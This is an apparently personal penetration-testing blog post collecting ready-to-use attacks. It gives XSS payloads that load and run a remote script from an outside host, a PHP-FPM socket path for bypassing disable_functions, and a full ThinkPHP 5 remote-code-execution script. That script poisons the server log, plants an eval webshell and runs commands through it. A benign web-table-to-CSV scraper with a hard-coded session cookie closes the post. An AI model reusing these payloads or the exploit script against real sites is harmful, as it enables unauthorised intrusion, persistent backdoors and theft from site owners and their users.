Periodic Notes

A short summary of the past stretch of work

Posted by BugMan on June 3, 2020


1.1 XSS

Tag payload: used to bypass poorly designed blacklist systems via the HTML5 autofocus attribute; because the input grabs focus automatically, onfocus fires without any user interaction.

atob() decodes base64 at runtime, so the payload's real logic can ride inside the id attribute:

"><input onfocus=eval(atob(this.id)) id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vMHh0Lnhzcy5odCI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs&#61; autofocus>

$.getScript() payload: an example payload for sites that ship jQuery; $.getScript(url) fetches a remote script and executes it.
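A minimal sketch in the same format as the payload above (the host is hypothetical, reused from the decoded payload):

"><script>$.getScript('//0xt.xss.ht')</script>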

2.1 Bypassing disable_functions

Default PHP-CGI (PHP-FPM) socket path on the BT (Baota) panel:

unix:///tmp/php-cgi-56.sock
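The point of this path: if PHP-FPM listens on this unix socket, you can speak FastCGI to it directly and smuggle PHP_ADMIN_VALUE directives past the web server (the classic FPM disable_functions bypass, as implemented in common fpm-attack tooling). A minimal connectivity sketch in Python, assuming the default socket path above; a full bypass would continue by sending FastCGI records over the same connection:

import socket

# Probe PHP-FPM's unix-domain socket. This only shows that the .sock
# file is what a FastCGI client connects to; it does not perform the
# bypass itself.
s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
s.connect('/tmp/php-cgi-56.sock')
print('FPM socket reachable')
s.close()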

3.1 Python scripts

ThinkPHP RCE

The script below chains the ThinkPHP 5 _method=__construct variable-override bug: it reads DOCUMENT_ROOT off the debug error page, plants a PHP dropper in the runtime log via the User-Agent header, then includes that log file through the think\__include_file filter so the dropper executes.

import datetime
import re

import requests

proxies = {
    'http': '127.0.0.1:8080',
    'https': '127.0.0.1:8080',
}

# Candidate runtime-log directories; an extra one can be supplied up front.
path = input('Log directory of the target (blank to use the defaults): ')
path1 = ['../runtime/log', '/runtime/log']
if path:
    path1.insert(0, path)

# ThinkPHP 5 writes its log to runtime/log/YYYYMM/DD.log.
today = datetime.date.today()
year = today.year
mon = str(today.month).rjust(2, '0')
day = str(today.day).rjust(2, '0')

url = input('Vulnerable site (for example: http://www.badu.cc/): ')


def check_debug():
    # Request a nonexistent route: with debug mode on, ThinkPHP's error
    # page leaks environment details, including DOCUMENT_ROOT.
    debug_txt = requests.get(url + '/1', proxies=proxies)
    pagecode = debug_txt.text.replace('\n', '').replace(' ', '')
    pattern = re.compile(
        '<divclass="col-md-3"><strong>DOCUMENT_ROOT</strong></div>'
        '<divclass="col-md-9"><small>(.*?)</small></div>')
    result = pattern.findall(pagecode)
    if not result:
        print('DOCUMENT_ROOT not found; the debug page may be disabled.')
        return None
    document_root = result[0]
    print(document_root)
    return document_root


def Req_Exp(x):
    # Poison the log: the User-Agent is written to today's log file
    # verbatim. The base64 decodes to a dropper that writes config.php,
    # a one-line shell that eval()s POST parameter "1" as PHP.
    headers1 = {
        'User-agent': '<?php echo "8888";file_put_contents("{0}/config.php",base64_decode("PD9waHAKCmNsYXNzIHh7CiAgICBwdWJsaWMgZnVuY3Rpb24gaXAoKXsKICAgICAgICRjPSAiICRfUE9TVFsxXSI7CiAgICAgICByZXR1cm4gJGM7CiAgICB9Cn0KJGMgPSBuZXcgeCgpOwokYiA9ICRjIC0+IGlwKCk7CmV2YWwoJGIpOwo/Pg=="));echo "456"; ?>'.format(x)
    }
    requests.get(url, headers=headers1, proxies=proxies)


def check_payload():
    # Include today's log through the _method=__construct variable
    # override, trying every candidate log directory.
    for i in path1:
        data = {
            '_method': '__construct',
            'method': 'get',
            'filter[]': 'think\\__include_file',
            'server': 'phpinfo',
            'get[]': '{0}/{1}{2}/{3}.log'.format(i, year, mon, day),
            'x': 'ls',
        }
        requests.post(url, data=data, proxies=proxies)


def check_shell():
    status = requests.get(url + '/config.php', proxies=proxies).status_code
    if status == 200:
        print(url + '/config.php is a working webshell')
    else:
        print('GetShell failed: config.php was not written.')


x = check_debug()
if x:
    Req_Exp(x)
    check_payload()
    check_shell()
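Once check_shell() reports success, the dropped config.php evals POST parameter 1 as PHP (that is what the base64 in Req_Exp decodes to), so a follow-up command is a single request. A hypothetical sketch, reusing the script's url and proxies:

# Run PHP through the planted eval-shell.
r = requests.post(url + '/config.php', data={'1': 'system("id");'},
                  proxies=proxies)
print(r.text)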

Writing a web-page table to a CSV file

import csv

import requests
from bs4 import BeautifulSoup

headers = {
    'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:41.0) Gecko/20100101 Firefox/41.0'
}

cookies = {
    'session': 'eyJ1c2VybmFtZSI6ImFkbWluQGdtYWlsLmNvbSJ9.XreRKA.ohlp6mCAttEMNdVJiqSvzxulWSE'
}

session = requests.Session()

csvFile = open(r'C:\Users\jxy\Desktop\maer\PG-爬虫\editors.csv', 'wt',
               newline='', encoding='utf-8')
writer = csv.writer(csvFile)

try:
    for i in range(1, 35):
        url = ''  # target page URL (left blank in the original), paged by i

        db_txt = session.get(url, headers=headers, cookies=cookies).content
        soup = BeautifulSoup(db_txt, 'lxml')
        table = soup.find_all('table',
                              {'class': 'pure-table pure-table-bordered'})[0]
        rows = table.find_all('tr')

        # One CSV row per <tr>; every <td>/<th> cell becomes a column.
        for row in rows:
            csvRow = [cell.get_text() for cell in row.find_all(['td', 'th'])]
            writer.writerow(csvRow)
            print(csvRow)
        print('Page (%s) written' % i)
finally:
    csvFile.close()
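Since the table markup is regular, pandas offers a shorter route. A sketch, assuming the page's class attribute is exactly the string matched above and that lxml is installed:

import pandas as pd
import requests

html = requests.get(url, headers=headers, cookies=cookies).text
# read_html returns one DataFrame per matching <table>.
tables = pd.read_html(html, attrs={'class': 'pure-table pure-table-bordered'})
tables[0].to_csv('editors.csv', index=False, encoding='utf-8')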